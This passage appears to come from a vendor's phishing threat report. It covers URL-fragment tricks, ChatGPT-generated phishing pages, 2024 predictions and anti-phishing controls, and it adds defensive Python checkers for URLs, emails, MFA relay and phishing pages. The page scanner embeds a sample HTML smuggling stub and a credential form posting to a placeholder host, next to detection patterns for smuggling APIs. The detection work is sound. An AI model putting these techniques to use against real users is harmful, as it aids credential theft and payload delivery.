The content after the "#" symbol is not sent to the server, so changes to the hash do not trigger a page refresh. This feature is often used in single-page applications and dynamic web content. For defenders this has a second consequence: a web proxy or server-side log never sees the fragment, so anything the attacker places there is invisible to network-based inspection and only client-side or URL-level analysis can recover it.

Phishing attackers have found two new ways to exploit this:

1. Representing user information with the hash. Email addresses are most common: when the login page is displayed, the user's email address from the fragment is automatically filled in to deceive the user.
2. Generating specific phishing pages based on the hash, which can distinguish users.
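The host normalization the Punycode and nonstandard IP section recommends, as an added Python example that is not from the report: it parses IPv4 addresses in every spelling browsers accept, decodes Punycode labels, and also flags the other URL-level evasions discussed on this page (an email address in the fragment, IPFS gateway paths, Google Translate proxying through translate.goog, and dynamic DNS hosts). The DDNS suffix list, the sample URLs and the CID placeholder are assumptions; xn--80ak6aa92e.com is the well-known Cyrillic look-alike of apple.com demonstrated in 2017.

```python
"""Added example (not from the report): normalise a URL's host the way a
browser does before matching it against blocklists, so that nonstandard IPv4
spellings, Punycode look-alikes, an email address in the fragment, IPFS
gateways, Google Translate proxying and dynamic DNS hosts all surface as
findings. The DDNS suffix list and the sample URLs are constructed assumptions.
"""
import re
from urllib.parse import urlsplit, unquote

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
DDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "myftp.biz")  # illustrative only
IPFS_GATEWAY_PATH = re.compile(r"^/ip[fn]s/[A-Za-z0-9]+")


def _parse_ipv4_part(part):
    """One dotted part in decimal, octal (leading 0) or hex (0x); None if invalid."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]*", part):
        return int(part[2:], 16) if len(part) > 2 else 0
    if len(part) > 1 and part[0] == "0":
        # WHATWG treats a leading zero as octal; "08" is therefore not an IP
        return int(part, 8) if re.fullmatch(r"[0-7]+", part) else None
    if re.fullmatch(r"[0-9]+", part):
        return int(part, 10)
    return None


def normalize_ipv4(host):
    """Dotted-decimal form if host is an IPv4 address in any browser-accepted
    spelling (1 to 4 parts, mixed bases), else None. Follows the WHATWG URL
    IPv4 parser: every part but the last is one byte, the last fills the rest."""
    parts = host.rstrip(".").split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = [_parse_ipv4_part(p) for p in parts]
    if any(n is None for n in nums):
        return None
    *head, last = nums
    if any(n > 255 for n in head) or last >= 256 ** (5 - len(nums)):
        return None
    value = last
    for i, n in enumerate(head):
        value += n << (8 * (3 - i))
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def triage_url(url):
    """Return (normalised host, list of evasion findings) for one URL."""
    s = urlsplit(url)
    host = (s.hostname or "").lower()
    findings = []
    dotted = normalize_ipv4(host)
    if dotted is not None:
        if dotted != host:
            findings.append("nonstandard-ipv4:" + dotted)
        host = dotted
    if any(label.startswith("xn--") for label in host.split(".")):
        try:
            shown = host.encode("ascii").decode("idna")  # what the address bar renders
        except UnicodeError:
            shown = host
        findings.append("punycode:" + shown)
    if host.endswith(".translate.goog"):
        findings.append("google-translate-proxy")
    if IPFS_GATEWAY_PATH.match(s.path) or ".ipfs." in host:
        findings.append("ipfs-gateway")
    if any(host == d or host.endswith("." + d) for d in DDNS_SUFFIXES):
        findings.append("dynamic-dns")
    if EMAIL_RE.search(unquote(s.fragment)):  # fragment never reaches the server
        findings.append("email-in-fragment")
    return host, findings


# Constructed sample URLs.
SAMPLES = [
    "http://0x7f.1/login",
    "http://2130706433/",
    "http://0177.0.0.1/",
    "https://xn--80ak6aa92e.com/signin",
    "https://login-microsoft-com.translate.goog/?_x_tr_sl=auto",
    "https://ipfs.io/ipfs/QmExampleCidPlaceholder123/index.html",
    "https://office365-update.duckdns.org/#alice@corp.example",
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(u, "->", triage_url(u))
```

The IPv4 parser is the part worth keeping: Python's ipaddress module rejects every nonstandard spelling above, so a blocklist keyed on ipaddress alone never sees that 0x7f.1 is localhost.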
AI and Phishing

Recent AI technology advances like ChatGPT make it easier for threat actors to develop malicious code, generate business email compromise (BEC) attacks, create polymorphic malware, and more. We attempted to generate a phishing login page using ChatGPT, and after just three simple interactions, the tool generated this webpage:

Figure 31: ChatGPT-generated phishing page

With a little more effort, an attacker could add a background and modify it to look like a genuine login page.
2024 Predictions

1. AI attacks will see more frequent use as threat actors discover new applications for these services. Expect to see more sophisticated scams across different communication channels, such as email, SMS, and websites. Also, prepare for a surge in phishing attempts as attackers leverage AI to launch more coordinated and effective attacks on larger groups of people.

2. Phishing-as-a-service offerings will continue to evolve, with providers offering customized phishing templates, access to larger databases of potential victims, and more advanced social engineering techniques. Providers may also offer additional services such as malware installation, hosting, and analytics. What's more, these providers will compete to offer the best value with affordable pricing models and 24/7 customer support. This may lead to an increase in small-scale phishing attacks, so it's crucial to stay informed about the latest phishing threats and trends.

3. Mobile attacks will become more prevalent as attackers focus on exploiting our reliance on these devices. Attackers will develop more mobile-friendly content, such as optimized apps, websites, and malware, including spyware and remote access trojans. They will also find new ways to extort victims for financial gain.

4. MFA bombing and AiTM attacks will increase as attackers find ways to bypass MFA security measures. MFA bombs overwhelm victims with authentication requests until one is approved, while AiTM attacks intercept the victim's session after they have successfully authenticated with MFA. Attackers will use advanced techniques, including AI, to predict and generate verification codes or identify patterns in user behavior to exploit for access. To protect against these attacks, it's important to use strong passwords, enable MFA, and monitor accounts for suspicious activity. Prefer phishing-resistant MFA such as FIDO2/WebAuthn security keys or passkeys: the credential is bound to the legitimate origin, so it is not accepted from an AiTM proxy's look-alike domain, and there is no push prompt or one-time code for an MFA bomb to target.

5. Personalized attacks will become more challenging to detect as attackers develop advanced reconnaissance techniques to gather information about potential victims. This information will be used to create tailored phishing emails that appear more legitimate and convincing, increasing their likelihood of success. As attackers become more sophisticated in their use of personalization, it will become increasingly difficult for users to identify and avoid phishing attacks.
Improve Your Phishing Defenses

Industry statistics reveal that the average organization receives dozens of phishing emails per day, with financial losses snowballing as the cost of follow-on malware and ransomware infections drives up the average cost of a landed phishing attack year over year. Facing all the threats outlined in this report is a difficult task, and while you can't eliminate the risk of phishing threats completely, you can lower your organization's chances of falling victim to them.

The basics for mitigating the risk of phishing attacks:


Best Practices: Security Awareness Training


Phishing campaigns have high success rates because they attack users, and it takes only one distracted employee to make an error in judgment and take the bait. A 2020 study by Stanford University reported that nearly 88% of data breaches were caused by human error. The report also revealed that young male employees are most vulnerable to phishing scams and that distraction is the leading cause of error across all demographics.

This is why end user awareness training is critical to preventing security breaches, and once a year is not enough. Everyone in your organization must be educated on how victims fall prey to phishing threats and be wary of giving out information or clicking links when dealing with untrusted emails, websites, text messages, applications, and phone calls.

Implementing continuous security awareness training and conducting regular phishing simulations are keys to developing a vigilant culture with strong phishing awareness. These activities allow you to deliver timely training to individuals that need extra support in identifying phishing attempts and modifying their risky behavior.

Another way to reduce the number of phishing incidents is to improve user reporting of suspected phishing emails, which can decrease the time it takes for security teams to remove related threats from other inboxes. This can be done by providing a "Report phishing" button directly in the inbox.

ThreatLabz further recommends that your awareness training follow the guidance from the US Cybersecurity and Infrastructure Security Agency (CISA) that advises end users to be on the lookout for the following indicators:

• Suspicious sender addresses. A sender's email address may imitate a legitimate business. Cybercriminals often use addresses that closely resemble those from reputable companies by altering or omitting a few characters.

• Generic greetings and signatures. Both a generic greeting, such as "Dear Valued Customer" or "Sir/Ma'am", and a lack of contact information in the signature block are strong indicators of a phishing email. A trusted organization will normally address you by name and provide their contact information.

• Spoofed hyperlinks and websites. If you hover your cursor over any links in the body of the email and the hover text doesn't match, the link may be spoofed. Malicious websites may look identical to legitimate sites, but the URL may use a spelling variation or a different domain (e.g., ".com" vs. ".net"). Additionally, cybercriminals may use a URL shortening service to hide the true destination of the link.

• Spelling and layout. Poor grammar and sentence structure, misspellings, and inconsistent formatting are other indicators of a possible phishing attempt. Reputable institutions have dedicated personnel who produce, verify, and proofread customer correspondence.

• Suspicious attachments. An unsolicited email requesting a user download and open an attachment is a common delivery mechanism for malware. A cybercriminal may use a false sense of urgency or importance to help persuade a user to download or open an attachment without examining it first.
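The indicators above are also the ones a mail gateway or triage script can check mechanically. The following is an added example, not code from the report or from CISA: a small Python checker that parses a raw message with the standard library and flags a lookalike sender domain, a generic greeting, a link whose visible text disagrees with its href, a URL shortener, and a risky attachment. The sample message, the brand-to-domain table, and the shortener list are constructed for the example; a production version would use a public-suffix list and the organization's own allowlist instead of the two-label "registrable" helper.

```python
import email
import email.utils
import re
from email import policy
from urllib.parse import urlparse

# Constructed sample message (not from the report). It carries a near-miss sender
# domain, a generic greeting, a link whose visible text disagrees with its href,
# a URL shortener, and an unsolicited HTML attachment.
SAMPLE_EMAIL = b"""From: "Microsoft Account Team" <security@rnicrosoft-support.com>
To: employee@corp.example
Subject: Unusual sign-in activity
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Dear Valued Customer,</p>
<p>We detected a sign-in from a new device. Review it now:
<a href="https://bit.ly/3xyzabc">https://account.microsoft.com/security</a></p>
</body></html>
--b1
Content-Type: application/octet-stream; name="invoice.html"
Content-Disposition: attachment; filename="invoice.html"
Content-Transfer-Encoding: base64

PGh0bWw+PC9odG1sPg==
--b1--
"""

# Domains the organization expects mail from for each brand (assumption).
KNOWN_BRAND_DOMAINS = {"microsoft": {"microsoft.com"}, "okta": {"okta.com"}}
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "goo.gl", "ow.ly", "is.gd"}
RISKY_EXTENSIONS = (".html", ".htm", ".iso", ".lnk", ".js", ".vbs", ".exe", ".zip")
GENERIC_GREETINGS = ("dear valued customer", "dear customer", "dear user", "sir/ma'am")
ANCHOR_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
TAG_RE = re.compile(r"<[^>]+>")


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch domains a character or two away from a real brand."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    """Last two labels of a host name; a stand-in for a public-suffix lookup (assumption)."""
    return ".".join(host.lower().split(".")[-2:])


def host_of(url: str) -> str:
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def analyze_email(raw: bytes) -> list:
    """Return (indicator, detail) pairs for the CISA indicators that can be checked offline."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []

    # Suspicious sender address: a brand in the display name but an unrelated or
    # near-miss sending domain ("rnicrosoft" for "microsoft").
    display, addr = email.utils.parseaddr(str(msg["From"]))
    sender_domain = addr.rsplit("@", 1)[-1].lower()
    for brand, domains in KNOWN_BRAND_DOMAINS.items():
        if brand in display.lower() and registrable(sender_domain) not in domains:
            findings.append(("sender_brand_mismatch", f"{display!r} sent from {sender_domain}"))
        for label in re.split(r"[.-]", sender_domain):
            if label != brand and 0 < levenshtein(label, brand) <= 2:
                findings.append(("lookalike_domain", f"{label} resembles {brand}"))

    # Generic greeting.
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body is not None else ""
    text = TAG_RE.sub(" ", html).lower()
    if any(greeting in text for greeting in GENERIC_GREETINGS):
        findings.append(("generic_greeting", "no personalised salutation"))

    # Spoofed hyperlinks: the visible text names one host, the href goes elsewhere,
    # or the href hides its destination behind a shortener.
    for href, label in ANCHOR_RE.findall(html):
        href_host = host_of(href)
        label_text = TAG_RE.sub("", label).strip()
        if "://" in label_text or label_text.startswith("www."):
            label_host = host_of(label_text)
            if label_host and label_host != href_host:
                findings.append(("link_text_mismatch", f"text shows {label_host}, href goes to {href_host}"))
        if href_host in SHORTENERS:
            findings.append(("url_shortener", href))

    # Suspicious attachments.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(RISKY_EXTENSIONS):
            findings.append(("risky_attachment", name))
    return findings


if __name__ == "__main__":
    for indicator, detail in analyze_email(SAMPLE_EMAIL):
        print(f"{indicator:22} {detail}")
```

The checks are deliberately independent so that each one maps to a line in the awareness material: a message that trips several of them at once is a strong candidate for the "Report phishing" queue, while a single weak hit (a shortener on its own, say) is better treated as a score than a verdict.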


Best Practices: Security Controls


To account for the fact that employees and other end users will invariably fall victim to phishing attempts, security teams must have protections in place to detect and mitigate damage. Key protections include:

• Email scanning. Email is by far the most common phishing vector, so a cloud-based email scanning service that inspects emails before they reach your perimeter, with real-time protection against malicious links and domain name spoofing, is crucial.

• Reporting. Phishing attacks often target many end users in an organization to increase the chances of success. Enable end users to report phishing attempts to block malicious senders and links as quickly as possible, ideally with a phishing reporting button built into users' email clients. Implement a playbook to investigate and respond to phishing incidents, including agency reporting to help the government fight scammers and stop attacks against other organizations.

• Multifactor authentication. MFA remains one of the most critical defenses against phishing. With MFA deployed, a password alone is not enough to compromise an account. Authentication apps such as Okta Verify or Google Authenticator are a step up from SMS codes, which can be intercepted or redirected through the carrier. Note, however, that a one-time code from an app is still relayed by an AiTM proxy in real time, so it does not stop the AiTM attacks described elsewhere in this report. Only phishing-resistant MFA (FIDO2/WebAuthn security keys or passkeys) defeats that relay, because the browser binds the signed assertion to the origin of the site that requested it.

• Encrypted traffic inspection. More than 95% of attacks use encrypted channels, which often are not inspected, making it easy for even moderately sophisticated attackers to bypass security controls. Organizations must inspect all traffic, whether or not it's encrypted, to prevent attackers from compromising their systems.

• Antivirus software. Endpoints should be protected with regularly updated antivirus to identify malicious files and prevent them from being downloaded.

• Advanced threat protection. Antivirus can stop known threats, but adversaries are capable of spinning up new, unknown malware variants that can evade signature-based detection tools. Deploy an inline sandbox that can quarantine and analyze suspicious files, and browser isolation that abstracts potentially malicious web content without disrupting end user workflows.

• URL filtering. Limit your phishing risk with URL filtering that uses policy to manage access to the riskiest categories of web content, such as newly registered domains.

• Regular patching. Keep applications, operating systems, and security tools up to date with the latest patches to reduce vulnerabilities, and ensure that you have the latest protections.

• Zero trust architecture. As important as it is to have controls in place to prevent phishing, it is equally important to have ones that limit the damage from a successful attack. Employ granular segmentation, enforce least-privileged access, and continuously monitor traffic to find threat actors who may have compromised your infrastructure.

• Threat intel feeds. These feeds integrate with your existing security tools to provide automated context enrichment for enhanced detection and faster resolution of phishing threats. They also provide updated context on reported URLs; extracted indicators of compromise (IOCs); and tactics, techniques, and procedures (TTPs) for actionable decision-making and prioritization.
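Prediction 4 and the multifactor authentication bullet above both turn on the same point: a factor the user types can be relayed, a factor the browser binds to an origin cannot. The following added example, which is not code from the report, models that difference in Python. It implements RFC 6238 TOTP for the authenticator-app case and a reduced WebAuthn assertion check for the security-key case, then runs an AiTM proxy against each. The relying party, its two domains, and the user's keys are constructed; the authenticator's ECDSA signature is replaced by an HMAC with a key the relying party also holds, and authenticatorData is reduced to a hash of the RP ID, both simplifications so the example has no dependencies.

```python
import hashlib
import hmac
import json
import secrets
import struct
import time

RP_ID = "login.example.com"                 # the real site (constructed)
RP_ORIGIN = "https://login.example.com"
PROXY_ORIGIN = "https://login-example.com"  # the AiTM proxy's lookalike (constructed)


def totp(secret: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP over HMAC-SHA1: the code an authenticator app displays."""
    counter = struct.pack(">Q", now // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)


def authenticator_sign(key: bytes, client_data_json: bytes) -> bytes:
    """What the authenticator signs: authenticatorData || SHA-256(clientDataJSON).
    authenticatorData is reduced to SHA-256(rpId) and the ECDSA signature to an HMAC
    with a key the relying party also holds; both are simplifications (assumption)."""
    auth_data = hashlib.sha256(RP_ID.encode()).digest()
    client_hash = hashlib.sha256(client_data_json).digest()
    return hmac.new(key, auth_data + client_hash, hashlib.sha256).digest()


def browser_client_data(page_origin: str, challenge: str) -> bytes:
    """The browser, not the page's JavaScript, records the origin that called
    navigator.credentials.get(); the page cannot lie about it."""
    return json.dumps({"type": "webauthn.get", "challenge": challenge,
                       "origin": page_origin}).encode()


class RelyingParty:
    def __init__(self):
        self.totp_secret = secrets.token_bytes(20)
        self.webauthn_key = secrets.token_bytes(32)   # stands in for the registered public key
        self.pending_challenge = None

    def verify_totp(self, code: str, now: int) -> bool:
        return hmac.compare_digest(code, totp(self.totp_secret, now))

    def issue_challenge(self) -> str:
        self.pending_challenge = secrets.token_urlsafe(32)
        return self.pending_challenge

    def verify_assertion(self, client_data_json: bytes, signature: bytes) -> bool:
        data = json.loads(client_data_json)
        if data.get("type") != "webauthn.get" or data.get("challenge") != self.pending_challenge:
            return False
        if data.get("origin") != RP_ORIGIN:     # origin binding: the check an AiTM proxy cannot pass
            return False
        return hmac.compare_digest(authenticator_sign(self.webauthn_key, client_data_json), signature)


def aitm_totp(rp: RelyingParty, now: int) -> bool:
    """Victim types the app's code into the proxy's page; the proxy replays it within the same window."""
    code_typed_into_proxy = totp(rp.totp_secret, now)
    return rp.verify_totp(code_typed_into_proxy, now)


def aitm_webauthn(rp: RelyingParty) -> bool:
    """Proxy relays the real challenge to the victim; the victim's browser signs with origin = proxy site."""
    challenge = rp.issue_challenge()                            # proxy fetched this from the real RP
    client_data = browser_client_data(PROXY_ORIGIN, challenge)  # browser records where the victim really is
    signature = authenticator_sign(rp.webauthn_key, client_data)
    if rp.verify_assertion(client_data, signature):             # rejected: origin mismatch
        return True
    # Second try: the proxy rewrites the origin before forwarding. The signature
    # covers SHA-256(clientDataJSON), so the patched JSON no longer verifies.
    patched = json.loads(client_data)
    patched["origin"] = RP_ORIGIN
    return rp.verify_assertion(json.dumps(patched).encode(), signature)


def legitimate_webauthn(rp: RelyingParty) -> bool:
    challenge = rp.issue_challenge()
    client_data = browser_client_data(RP_ORIGIN, challenge)
    return rp.verify_assertion(client_data, authenticator_sign(rp.webauthn_key, client_data))


if __name__ == "__main__":
    rp = RelyingParty()
    now = int(time.time())
    print("AiTM relay of a TOTP code succeeds:      ", aitm_totp(rp, now))
    print("Legitimate WebAuthn login succeeds:      ", legitimate_webauthn(rp))
    print("AiTM relay of a WebAuthn login succeeds: ", aitm_webauthn(rp))
```

The TOTP path has no input the relying party can use to tell the proxy from the victim: the code is correct, it arrives within the 30-second window, and the password that accompanied it is real. The WebAuthn path fails twice, once because the origin the browser wrote into clientDataJSON names the proxy's site, and again because changing that field invalidates the signature over it. A real relying party would also invalidate the challenge after one use and verify the authenticator's public-key signature rather than the shared-key HMAC used here.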


Best Practices: How to Identify a Phishing Page


Phishing pages can be identified by indicators of common tactics threat actors use to trick users and security engines, as well as by shortcuts threat actors often take when generating new phishing pages. The creation of new phishing sites spikes around holidays and other isolated events. For example, during the pandemic, the security industry witnessed attackers launching a trove of fake COVID-19 websites that took advantage of victims by impersonating health organizations as well as test kit and medical supply ordering sites.

To detect the latest phishing threats, it is important to stay on top of the latest research and ingest actionable intel with updated indicators for use across your detection rules and response workflows.

The following is an overview of various indicators you (and your anti-phishing tools) should look out for:

The entire page is based on a single image. Attackers leverage image-based phishing, wherein the entire page consists of a background image that is a copy of a legitimate webpage. The only other component on the page is a web form to collect stolen credentials. This is a very common technique used to target banks, in particular.

The page has no title.


The page has an empty anchor for critical links. Phishing pages often use empty anchors (an href of "#", or no href at all) for important pages like Help, FAQs, etc., when they copy content from legitimate pages.

The page contains obfuscated tags. Phishing operators may obfuscate fields such as title, copyright, etc.

The page replaces key characters with "homoglyphs." Homoglyphs, characters that look similar to other characters, are abused on phishing pages to avoid detection. This technique leverages similarities in characters belonging to different character scripts to trick users as well as security engines looking to match ASCII patterns.

The page has a self-signed certificate.

The page appears to be a generic webmail client. Phishing actors often use generic webmail pages for phishing mail credentials, imitating sites like Webmail, Zimbra, etc.

The page is not encrypted. A login prompt on an "http" page is suspicious and should be flagged.

The page has multiple redirects before landing on a login prompt.

The page contains HTML smuggling. With HTML smuggling, attackers embed an encoded payload inside an HTML attachment; JavaScript in the attachment decodes it and assembles the real file in the browser (typically by way of atob() and a Blob download), so the payload never crosses the email filter in an inspectable form. HTML smuggling in conjunction with a login prompt is highly suspicious behavior.
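Most of the indicators in this list can be computed from a saved copy of the page, which is how a detection engine or a triage script would apply them. The following is an added example, not code from the report: a Python scanner built on the standard-library HTML parser that flags a missing title, an image-plus-form page, empty anchors, mixed-script homoglyphs in the visible text, a credential form that posts over plain http, and an HTML smuggling stub. The indicators that need a live connection (a self-signed certificate, a redirect chain) and the obfuscated-tag and generic-webmail checks are left out. The sample page is constructed; its "smuggled" payload is a harmless one-line HTML document.

```python
import base64
import re
import unicodedata
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not from the report) that shows several indicators at
# once: no <title>, a full-width image plus a credential form, dead anchors, a
# Cyrillic "а" inside "Paypal", a form posting over plain http, and an HTML
# smuggling stub that rebuilds a base64 payload in the browser.
SMUGGLED_B64 = base64.b64encode(
    b"<html><body><form><input name=pw type=password></form></body></html>").decode()
SAMPLE_PAGE = f"""<html><head></head><body>
<img src="bank_login.png" style="width:100%">
<form action="http://secure-login.example.net/post.php" method="post">
  <input name="user"><input name="pass" type="password"><button>Sign in</button>
</form>
<a href="#">Help</a> <a href="">FAQ</a> <a href="javascript:void(0)">Contact</a>
<p>Welcome to P\u0430ypal</p>
<script>
var b = "{SMUGGLED_B64}";
var blob = new Blob([atob(b)], {{type: "text/html"}});
var a = document.createElement("a"); a.href = URL.createObjectURL(blob);
a.download = "statement.html"; a.click();
</script>
</body></html>"""

EMPTY_HREFS = {"", "#", "javascript:void(0)", "javascript:;"}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SMUGGLING_API = re.compile(r"\b(?:atob|Blob|createObjectURL|msSaveOrOpenBlob)\b|\.download\s*=")


class PageFeatures(HTMLParser):
    """Collects the handful of page features the indicators below are computed from."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.images = 0
        self.forms = []      # {"action": str, "has_password": bool}
        self.anchors = []    # href values
        self.scripts = []    # inline script bodies
        self.text = []       # visible text fragments
        self._mode = None    # "title" | "script" | None
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "title":
            self._mode = "title"
        elif tag == "script":
            self._mode = "script"
            self.scripts.append("")
        elif tag == "img":
            self.images += 1
        elif tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["has_password"] = True
        elif tag == "a":
            self.anchors.append(a.get("href", "").strip())

    def handle_endtag(self, tag):
        if tag in ("title", "script"):
            self._mode = None
        elif tag == "form":
            self._form = None

    def handle_data(self, data):
        if self._mode == "title":
            self.title += data
        elif self._mode == "script":
            self.scripts[-1] += data
        else:
            self.text.append(data)


def scripts_in(word: str) -> set:
    """Unicode scripts of the letters in a word, e.g. {'LATIN', 'CYRILLIC'} for a homoglyph mix."""
    return {unicodedata.name(c, "").split(" ")[0] for c in word if c.isalpha()}


def analyze_page(html: str, page_url: str) -> list:
    """Return the indicator names that fire for a saved page fetched from page_url."""
    f = PageFeatures()
    f.feed(html)
    visible = " ".join(t.strip() for t in f.text if t.strip())
    found = []
    if not f.title.strip():
        found.append("no_title")
    # A background image, a credential form and almost no real text.
    if f.images >= 1 and f.forms and len(visible) < 80:
        found.append("image_based_page")
    if any(h.lower() in EMPTY_HREFS for h in f.anchors):
        found.append("empty_anchors")
    if any(len(scripts_in(w)) > 1 for w in visible.split()):
        found.append("homoglyph_text")
    # Credentials leaving over http, whether the page itself is https or not.
    for form in f.forms:
        target = form["action"] or page_url
        if form["has_password"] and urlparse(target).scheme == "http":
            found.append("plaintext_login_form")
            break
    # A long base64 literal plus two or more of the decode/download APIs.
    if any(BASE64_BLOB.search(s) and len(SMUGGLING_API.findall(s)) >= 2 for s in f.scripts):
        found.append("html_smuggling")
    return found


if __name__ == "__main__":
    print(analyze_page(SAMPLE_PAGE, "https://secure-login.example.net/login"))
```

Two details are worth keeping when adapting this: the homoglyph check works per word across Unicode scripts rather than from a fixed confusables table, so it also catches Greek or other substitutions the table would miss, and the plaintext-form check looks at the form's action rather than only the page URL, since a page served over https that posts credentials to an http endpoint is exactly the case the "http login prompt" indicator is meant to catch.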

How the Zscaler Zero Trust Exchange Can Mitigate Phishing Attacks

User compromise is one of the most difficult security challenges to defend against. Your organization must implement phishing prevention controls as part of a broader zero trust strategy that enables you to detect active breaches and minimize the damage caused by a successful breach. The Zscaler Zero Trust Exchange™ is built on a holistic zero trust architecture that helps stop phishing by:

• Preventing compromise: Full TLS/SSL inspection at scale, browser isolation, and policy-driven access control to prevent access to suspicious websites.

• Eliminating lateral movement: Connect users directly to apps, not the network, to limit the blast radius of a potential incident.

• Shutting down compromised users and insider threats: If an attacker gains access to your identity system, the Zero Trust Exchange prevents private app exploit attempts with inline inspection and detects the most sophisticated attackers with integrated deception.

• Stopping data loss: Inspect data-in-motion and at-rest to prevent potential theft by an active attacker.


Related Zscaler Products

Zscaler Internet Access™ helps identify and stop malicious activity by routing and inspecting all internet traffic through the Zero Trust Exchange. Zscaler blocks:

• URLs and IPs observed in the Zscaler cloud and from natively integrated open source and commercial threat intel sources. This includes policy-defined, high-risk URL categories commonly used for phishing, such as newly observed and newly activated domains.

• Traffic matching IPS signatures developed from ThreatLabz analysis of phishing kits and pages.

• Novel phishing sites identified by content scans powered by AI/ML detection.

Advanced Threat Protection blocks all known C2 domains.

Advanced Firewall extends C2 protection to all ports and protocols, including emerging C2 destinations.

Browser Isolation creates a safe gap between users and malicious web categories, rendering content as a stream of picture-perfect images to eliminate data leakage and the delivery of active threats.

Advanced Cloud Sandbox prevents unknown malware delivered in second stage payloads.

Zscaler Private Access™ safeguards applications by limiting lateral movement with least-privileged access, user-to-app segmentation, and full inline inspection of private app traffic.

Zscaler Deception™ detects and contains attackers attempting to move laterally or escalate privileges by luring them with decoy servers, applications, directories, and user accounts.

Your Next Steps

Uncover critical risks across your entire public cloud environment with the Zscaler Security Risk Assessment. Get a complete cloud asset inventory, a clear picture of your public cloud security risks, an overview of how you're meeting compliance benchmarks, and actionable remediation guidance.

About ThreatLabz
ThreatLabz is the security research arm of Zscaler. This world-class team is responsible
for hunting new threats and ensuring that the thousands of organizations using the global
Zscaler platform are always protected. In addition to malware research and behavioral
analysis, team members are involved in the research and development of new prototype
modules for advanced threat protection on the Zscaler platform, and regularly conduct
internal security audits to ensure that Zscaler products and infrastructure meet security
compliance standards. ThreatLabz regularly publishes in-depth analyses of new and
emerging threats on its portal, research.zscaler.com.

Stay updated on ThreatLabz research by subscribing to our Trust Issues newsletter today.

About Zscaler
Zscaler (NASDAQ: ZS) accelerates digital transformation so that customers can be more
agile, efficient, resilient, and secure. The Zscaler Zero Trust Exchange™ protects thousands
of customers from cyberattacks and data loss by securely connecting users, devices, and
applications in any location. Distributed across more than 150 data centers globally, the
SASE-based Zero Trust Exchange is the world’s largest inline cloud security platform.

Learn more at zscaler.com or follow us on Twitter @zscaler.

Appendix

Categorizing Phishing Attacks

Phishing attacks can be categorized in a variety of ways and can include multiple techniques. However, attackers are adapting their approaches to dupe increasingly savvy users and evade defense tools. Here, we outline common phishing attack definitions and characteristics.

The lists here include several descriptions of physical attack methods and the threat they pose to organizations. The majority of this report focuses on virtual phishing threats that require an internet connection to carry out. A telltale characteristic of online phishing scams is that they typically request users to submit information or download malware via one of the following methods:

• Link: A user clicks on a malicious link to a phishing site, hosted file, or malware.

• Prompt: A user is prompted to submit sensitive information, resulting in data theft.

• Attachment: A user opens an attachment that delivers malicious software.

As you plan what to invest in to reduce phishing incidents this year, consider the following types of phishing attacks.

A to Z: Common Types of Phishing Attacks

1. Angler phishing: Attackers pose as customer support and offer to help resolve negative comments about a company posted on social media, targeting dissatisfied customers, particularly those of banks.

2. Adversary-in-the-middle (AiTM) phishing: Attackers place a proxy between the victim and the legitimate site, relaying the victim's actions in real time so that they obtain the login credentials and the session cookies issued after authentication.

3. Baiting phishing: Attackers use tempting offers, file names, or devices to entice curious individuals into a trap, similar to a trojan horse attack.

4. Browser-in-the-browser (BiTB) phishing: Attackers display a malicious browser window within a browser window to imitate a legitimate domain and replicate pop-up login windows that appear to be from third-party authentication providers.

5. CEO fraud or business email compromise (BEC) phishing: Attackers target company employees using compromised executive accounts to send fake invoices or requests for payment by wire transfer or other forms.

6. Chat or IM phishing: Attackers use instant messages to deliver scams within apps, typically with malicious URL links.

7. Clone phishing: Attackers create duplicate email messages that appear to be from trusted sources, with slight modifications and malicious attachments or links.


8. Credential harvesting phishing: Attackers create fake login pages or send phishing emails that mimic legitimate login prompts to steal usernames and passwords from unsuspecting victims.

9. Doc clouding phishing: Attackers deliver malicious documents from common cloud sources like Google Drive, Box, or OneDrive to bypass traditional security tools and make it challenging for most security teams to detect.

10. Email phishing: Attackers send socially engineered email messages posing as known brands, with malicious URL links or attached assets designed to steal information or deliver malware.

11. Evil twin phishing: Attackers mimic a trusted public Wi-Fi network to observe victims' online activity and steal data traversing the malicious access point.

12. HTTPS phishing: Attackers serve phishing pages over HTTPS so that the browser padlock lends credibility to malicious URL links and trusting users click them.

13. Malvertising phishing: Attackers use scripts in advertisements to deliver unwanted content directly to victims' computers.

14. MFA bombing: Attackers trick users with compromised credentials into verifying an illegitimate MFA request made by the threat actor. These attacks are typically characterized by a continuous stream of MFA requests, sometimes accompanied by a fake call, text, or email that tricks the user into unknowingly or accidentally verifying one of the requests.

